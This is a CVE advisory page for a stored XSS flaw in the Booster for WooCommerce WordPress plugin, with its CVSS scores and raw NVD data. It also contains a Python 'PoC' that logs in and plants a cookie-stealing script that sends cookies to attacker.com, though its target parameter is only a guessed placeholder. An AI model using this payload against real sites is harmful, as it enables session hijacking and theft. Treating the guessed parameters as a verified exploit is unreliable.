Security Vulnerability Report
中文
CVE-2025-64380 CVSS 6.5 MEDIUM

CVE-2025-64380

Published: 2025-11-13 10:15:54
Last Modified: 2026-01-30 18:15:58

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Pluggabl Booster for WooCommerce woocommerce-jetpack allows Stored XSS.This issue affects Booster for WooCommerce: from n/a through <= 7.3.2.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:booster:booster_for_woocommerce:*:*:*:*:*:wordpress:*:* - VULNERABLE
Booster for WooCommerce <= 7.3.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-64380 PoC - Stored XSS in Booster for WooCommerce # Target: WordPress site with Booster for WooCommerce <= 7.3.2 TARGET_URL = "http://target-wordpress-site.com" USERNAME = "attacker_user" PASSWORD = "attacker_password" # XSS payload - steals cookies XSS_PAYLOAD = '<script>fetch("https://attacker.com/log?c="+document.cookie)</script>' def login_wp(): """Login to WordPress and get session cookie""" session = requests.Session() login_url = f"{TARGET_URL}/wp-login.php" data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'redirect_to': f"{TARGET_URL}/wp-admin/" } response = session.post(login_url, data=data) return session if 'wordpress_logged_in' in session.cookies else None def exploit_stored_xss(session): """Inject XSS payload into vulnerable field""" # Target the vulnerable woocommerce-jetpack module # Adjust the endpoint based on the actual vulnerable parameter post_url = f"{TARGET_URL}/wp-admin/admin.php?page=wc-settings&tab=jetpack" # This payload targets the vulnerable input field # The actual vulnerable parameter needs to be identified through testing exploit_data = { 'jetpack_option_name': XSS_PAYLOAD, # Example parameter 'wc-jetpack-submit': 'Save' } response = session.post(post_url, data=exploit_data) return response.status_code == 200 def main(): print(f"[*] CVE-2025-64380 PoC - Booster for WooCommerce Stored XSS") print(f"[*] Target: {TARGET_URL}") session = login_wp() if not session: print("[-] Authentication failed") sys.exit(1) print("[+] Successfully authenticated") if exploit_stored_xss(session): print("[+] XSS payload injected successfully") print(f"[*] Payload: {XSS_PAYLOAD}") print("[*] Wait for admin to visit affected page to trigger XSS") else: print("[-] Failed to inject payload") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64380", "sourceIdentifier": "[email protected]", "published": "2025-11-13T10:15:54.017", "lastModified": "2026-01-30T18:15:58.097", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Pluggabl Booster for WooCommerce woocommerce-jetpack allows Stored XSS.This issue affects Booster for WooCommerce: from n/a through <= 7.3.2."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:booster:booster_for_woocommerce:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "7.4.0", "matchCriteriaId": "19D0F800-5C26-4757-9A29-EF51285FF693"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/woocommerce-jetpack/vulnerability/wordpress-booster-for-woocommerce-plugin-7-3-2-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}